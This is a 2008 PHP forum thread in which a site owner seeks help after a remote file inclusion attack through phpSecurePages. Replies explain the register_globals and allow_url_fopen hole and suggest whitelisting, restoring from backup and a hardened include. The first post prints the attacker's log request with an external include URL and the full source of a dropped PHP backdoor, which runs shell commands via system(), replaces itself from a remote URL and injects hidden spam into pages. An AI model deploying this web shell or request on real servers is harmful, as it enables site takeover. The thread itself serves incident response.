ziggy1621 Posted October 16, 2008 I've got a site that an IRC bot seems to be attacking, writing an ActiveX virus after the <body> tags. I've been fighting this for weeks and here is what I have.... It is shared hosting, so php.ini is not available and my htaccess is limited. register_globals was on; today I turned it off after some extensive reading. The hacker is running code like the following, found in my logs: //phpSecurePages/secure.php?&cfgProgDir=http://rdxihx.angelfire.com/php where the host it's getting the file from changes each time, so blocking IPs/domains doesn't work, and I have actually deleted phpSecurePages from the site and yet this script still works. You can follow the link after cfgProgDir to read the code that it accesses; then sometimes it creates a random file with the following code:
<?php ignore_user_abort(1); set_time_limit(0); function Clear() { unlink("c"); unlink("1r"); unlink("log"); } function Clear2() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); $fin = ereg_replace("<!--dd4-->", "", $fin); $fin = ereg_replace("<!--dd5-->", "", $fin); $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); echo " upt-ok"; } function GetVar($name, &$var) { $var = ""; if (isset($_POST[$name])) $var = $_POST[$name]; if (isset($_GET[$name])) $var = $_GET[$name]; if (($var) =="") return false; else return true; } function Gen() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_POST["gm"])) $g = $_POST["gm"]; if (isset($_GET["gm"])) $g = 
$_GET["gm"]; $path = ""; $fr = fopen("1r", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); $cname = trim($fconf[1]); $curs = trim($fconf[2]); $pid = trim($fconf[3]); if ($pid == 100) { $pid = 0; $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); $curs = $g; } } else { $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; $pid = 0; $curs = $g; mkdir($tname); $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fp = fopen($gname."?g=$curs", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); fwrite($fnd, $fin); fclose($fnd); } if ($j==100) { $fp = fopen($gname."?g=$curs&m=1", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); fwrite($fnd, $fin); fclose($fnd); $map = "$path/$tname/$cname/$curs"."_lm.htm"; fwrite($fr,"$map\n"); } $fconf = fopen("c", "w+"); fwrite($fconf, $tname."\n"); fwrite($fconf, $cname."\n"); fwrite($fconf, $curs."\n"); $nj = $j; fwrite($fconf, $nj."\n"); fclose($fconf); } function Update() { $thisname = "1.php"; if (isset($_POST['u'])) $u = $_POST['u']; if (isset($_GET['u'])) $u = $_GET['u']; $fp = fopen($u, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fthis = fopen($thisname, 
"w+"); fwrite($fthis, $fin); fclose($fthis); } function Com() { if (isset($_POST['c'])) @system($_POST['c']); if (isset($_GET['c'])) @system($_GET['c']); } function MRepl() { $mpt = ""; $drs = ""; $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; $endtag = "</font></body></html><dd5> "; $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); GetVar("mpt", $mpt); // remove closing html tags $fin = preg_replace ("/<\/body>/i", "", $fin); $fin = preg_replace ("/<\/html>/i", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fp = fopen($mpt, "r"); $drs = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) { exit(); } $drs .= $fc; } fclose($fp); $fin = $fin.$begtag; $fin = $fin.$drs; $fin = $fin.$endtag; $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function Main() { if (isset($_POST['u']) || isset($_GET['u'])) { Update(); exit(); } if (isset($_POST['c']) || isset($_GET['c'])) { Com(); exit(); } if (isset($_POST['g']) || isset($_GET['g'])) { Gen(); exit(); } if (isset($_POST['s']) || isset($_GET['s'])) { MRepl(); exit(); } if (isset($_POST['cl']) || isset($_GET['cl'])) { Clear(); exit(); } if (isset($_POST['cl2']) || isset($_GET['cl2'])) { Clear2(); exit(); } echo "<ok>"; } Main(); ?>
Any Help Appreciated... I'm dying here
CroNiX Posted October 16, 2008 Anytime I use $_GET variables, I always check them against a whitelist contained in an array. If it's not in the array, it just outputs 'Page Error'. Example: www.mysite.com/index.php?action=help in my code, I have: $action = isset($_GET['action']) ? $_GET['action'] : ""; //.... $allowable_actions = array('help', 'delete'); if(!in_array($action, $allowable_actions)) die('Page Error'); // ... rest of code... so if action does not = 'help' or 'delete' it kills the application and prevents any tampering. There is more to do, like run the $_GET superglobal through a sanitizer, but this little whitelist goes a long way.
waynew Posted October 16, 2008 How is he getting his files onto your server?
AV1611 Posted October 16, 2008 I hate to tell you, but if he's putting a file on your server then you've been compromised. You need to reinstall from scratch. Period. You MIGHT get lucky with a rootkit, but prolly he's got crap in your system. It could be something like the ls command, for example, having been patched to recreate it or whatever. You're screwed. 1. Linux or Winblow? 2. Virt domain or host domain? 3. Your server or hosted?
CroNiX Posted October 16, 2008 By the initial posting, it appears to be XSS. The hacker is seeing if you do something like: if(isset($_GET['cfgProgDir'])) include($_GET['cfgProgDir']); which would load and execute the file located at http://rdxihx.angelfire.com/php
discomatt Posted October 16, 2008 Wipe every file you can. Fix security hole on a local test server. Re-upload.
CroNiX Posted October 16, 2008 "Wipe every file you can. Fix security hole on a local test server. Re-upload." I wouldn't advise that unless you know for sure that the server is compromised. If he has remote inclusion turned off, the hack attempt he is talking about is useless and is only showing up in logs...
discomatt Posted October 16, 2008 I don't believe this is an XSS issue. I believe his site is compromised. No sense in giving the attacker access through their script any longer than they already have.
PFMaBiSmAd Posted October 16, 2008 The phpSecurePages script (despite its name) was setting up the cfgProgDir variable in the main file as the name of a file to be included in the setup.php file. Since register_globals and allow_url_fopen were on, this allowed the GET parameter on the end of the URL to set cfgProgDir when setup.php was requested directly, and external raw PHP code was included and executed on the server (almost as if a hacker had written this script to work this way.) The phpSecurePages script has since been patched to make sure this specific security hole has been closed, but too late for everyone whose site has been taken over. Since any possible code could have been included and executed, anything could have been changed that PHP has access to: other .php files could have been modified or whole files added, any available shell() command could have been executed, or any usernames/passwords stored in PHP files or in a database could have been read or added to... If your site is still being taken over after you have deleted the phpSecurePages script, you need to find out how it is being done. If you compare all the filenames and file contents with a good backup version and compare the contents of all databases with a good backup version, you should be able to find out what has been changed. You can either remove the added/changed files or database entries, or you can delete everything and restore from a good backup version.
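The include pattern that CroNiX and PFMaBiSmAd describe, placed next to a hardened loader, as an added example that is not code from the thread or from phpSecurePages. The function names, the PROG_DIR constant and the allowed file list are assumptions of this example; only the cfgProgDir/register_globals/allow_url_fopen mechanism comes from the thread.

```php
<?php
// Added example, not code from the thread or from phpSecurePages: the include
// pattern PFMaBiSmAd and CroNiX describe, next to a hardened loader. The
// function names, PROG_DIR and the file list are assumptions of this example.

// VULNERABLE shape, as the thread describes it. With register_globals=On the
// request secure.php?cfgProgDir=http://... creates $cfgProgDir before this runs,
// and with allow_url_fopen=On include() fetches and executes the remote file.
function load_prog_dir_vulnerable()
{
    global $cfgProgDir;      // comes from the query string, not from the config
    include($cfgProgDir);    // same effect as include($_GET['cfgProgDir'])
}

// HARDENED shape: the directory is fixed in the script, the name must be on a
// short list, and the resolved path must sit inside that directory.
define('PROG_DIR', dirname(__FILE__) . '/phpSecurePages');

function is_safe_prog_file($name)
{
    $allowed = array('setup.php', 'config.php');   // assumed list for the example
    if (!in_array($name, $allowed, true)) {
        return false;                              // unknown name, or not a string
    }
    $base = realpath(PROG_DIR);
    $path = realpath(PROG_DIR . '/' . $name);
    // The list already rejects any remote value; realpath() adds a second layer:
    // it resolves ../ and symlinks and returns false for a missing file, and the
    // prefix test keeps the resolved file under PROG_DIR.
    return $base !== false && $path !== false
        && strpos($path, $base . DIRECTORY_SEPARATOR) === 0;
}

function load_prog_file($name)
{
    if (!is_safe_prog_file($name)) {
        return false;
    }
    include PROG_DIR . '/' . $name;
    return true;
}

// Where php.ini is out of reach, mod_php reads this from .htaccess when the host
// permits it; allow_url_fopen/allow_url_include are php.ini-level settings to
// ask the host to turn off.
//   php_flag register_globals off
```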